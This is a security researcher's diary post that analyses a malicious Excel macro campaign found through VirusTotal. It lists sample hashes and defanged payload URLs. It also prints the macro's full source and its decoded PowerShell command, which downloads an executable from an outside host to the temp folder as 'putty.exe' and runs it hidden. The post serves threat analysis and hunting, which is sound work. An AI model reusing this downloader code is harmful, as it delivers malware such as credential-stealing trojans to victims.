Tracking A Malware Campaign Through VT

Published: 2020-08-24. Last Updated: 2020-08-24 07:34:42 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

During the weekend, I found several samples from the same VBA macro. The only difference between all the samples was the URL to fetch a malicious PE file. I have a specific YARA rule to search for embedded PowerShell strings and my rule fired several times with the same pattern and similar size. Here is the pattern:

31 78 77 64 58 52 30 65 53 35 6C 65 47 55 6E 4B  1xwdXR0eS5leGUnK
54 73 6F 54 6D 56 33 4C 55 39 69 61 6D 56 6A 64  TsoTmV3LU9iamVjd
43 41 74 59 32 39 74 49 46 4E 6F 5A 57 78 73 4C  CAtY29tIFNoZWxsL

YARA reacted on 'TmV3LU9iamVjd' which is the Base64-encoded string 'New-Object'.

I downloaded several files to analyze them:

Hash Score Timestamp Submission Country
2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae 8/58 2020-08-20 02:05:10 UTC e74f3978 US
c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 9/57 2020-08-20 03:39:30 UTC e74f3978 US
d86cfc2c43a0599b23416cfc3be08e8c3d8d2b2b7b7b935b76d8ec6aa70e1705 8/58 2020-08-20 01:13:49 UTC e74f3978 US
174b27b020f930f5395cd993e92ebfc2795b1f3664265be7cea9d1405e870cd0 7/58 2020-08-19 19:30:20 UTC e74f3978 US
caf1e1da396743767f9e2a3c4b85780bc0146aeaae8bed18aef9d5c918fda439 9/57 2020-08-21 00:05:49 UTC e74f3978 US
b52f376b6b49a7c73e7a0befc821661bb9f19f5b4cf1561f277f7d347745a199 9/57 2020-08-20 22:57:00 UTC e74f3978 US
ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 9/58 2020-08-20 22:43:53 UTC e74f3978 US
670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c 8/56 2020-08-20 23:44:18 UTC e74f3978 US
b0f6c17244c2f8cce46425212f5cf9786fbd36727c34bf4d10d90d6a073a539e 9/57 2020-08-20 23:58:14 UTC e74f3978 US
d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb 8/57 2020-08-20 22:45:54 UTC e74f3978 US
b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 8/58 2020-08-20 23:39:47 UTC e74f3978 US
670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c 9/57 2020-08-22 03:56:41 UTC e74f3978 US
ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 9/57 2020-08-22 03:31:37 UTC e74f3978 US
670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c 9/57 2020-08-22 03:56:41 UTC e74f3978 US
d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb 9/56 2020-08-22 03:54:50 UTC e74f3978 US
2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae 9/58 2020-08-22 03:45:04 UTC e74f3978 US
b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 8/56 2020-08-22 03:37:19 UTC e74f3978 US
566e46a36fbeadf23a43541d8fb19d5d1cd8f3e33b60abef221a1f6a1af0f1cb 9/57 2020-08-22 03:34:29 UTC e74f3978 US

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

As you can see, all samples were submitted from the US and from the same account. Their scores are also very close to each other.

All of them contain the same VBA macro and the only difference is the downloader link:

$ diff \
   c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 \
   d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb
10c10
< Loader"aHR0cDovLzE5OC4xMi42Ni4xMDQvbVZQMjlVQVl4bEZsU3JGLmV4ZQ=="
---
> Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="

Here is the list of extracted URLs:

$ grep 'Loader"' * | awk -F '"' '{ print $2}' | while read L; do echo $L | base64 -d; echo ; done
hxxp://198[.]12[.]66[.]104/bOYzlVIPPDT3m7g[.]exe
hxxp://198[.]12[.]66[.]106/924ZJpzgdvpZuNt[.]exe
hxxp://198[.]12[.]66[.]106/TuSQk2FmRK1iLJI[.]exe
hxxp://198[.]12[.]66[.]104/jojocrypted[.]exe
hxxp://198[.]12[.]66[.]106/royalcrypted[.]exe
hxxp://brandotoday[.]com/Sample3[.]exe
hxxp://198[.]12[.]66[.]104/99crypted[.]exe
hxxp://198[.]12[.]66[.]104/mVP29UAYxlFlSrF[.]exe
hxxp://198[.]12[.]66[.]104/miccrypted[.]exe
hxxp://198[.]12[.]66[.]106/flocrypted[.]exe
hxxp://198[.]12[.]66[.]106/qlOZ1gn6tOo0tx7[.]exe
hxxp://198[.]12[.]66[.]106/vipcrypted[.]exe

The macro is a simple but effective one. It tries to download and execute the payload as 'putty.exe':

Private Sub Workbook_Open()
  Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
End Sub

Public Sub Loader(Link As String)
  CreateObject(AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run   (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub

The decoded executed content is:

CreateObject(WScript.Shell)).Run( \
  powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile(' \
  & Link & \
  ',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')

All downloads failed but I found a sample already available on VT[1]. It looks like an Agent Tesla.

The question is: who's behind the submission key and submitted so many times those samples? VT does not allow us to search all submissions from the same account (which could be a great feature for hunting purposes!).

Some possible scenario:

  • Developers of the macro who are testing their macro? I don't think because just the link changes across all the submissions
  • An organization that's facing many similar documents and they have an automatic submission to VT?
  • Another security researcher?

While writing this diary, I still found five new samples, it's still ongoing!

[1] https://www.virustotal.com/gui/file/27cd7db1194c765f280f35172aa5a27c4195a86d1bfc0985151ad43265a7620b/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Monday, August 24th 2020 https://isc.sans.edu/podcastdetail.html?id=7136

Comments


Diary Archives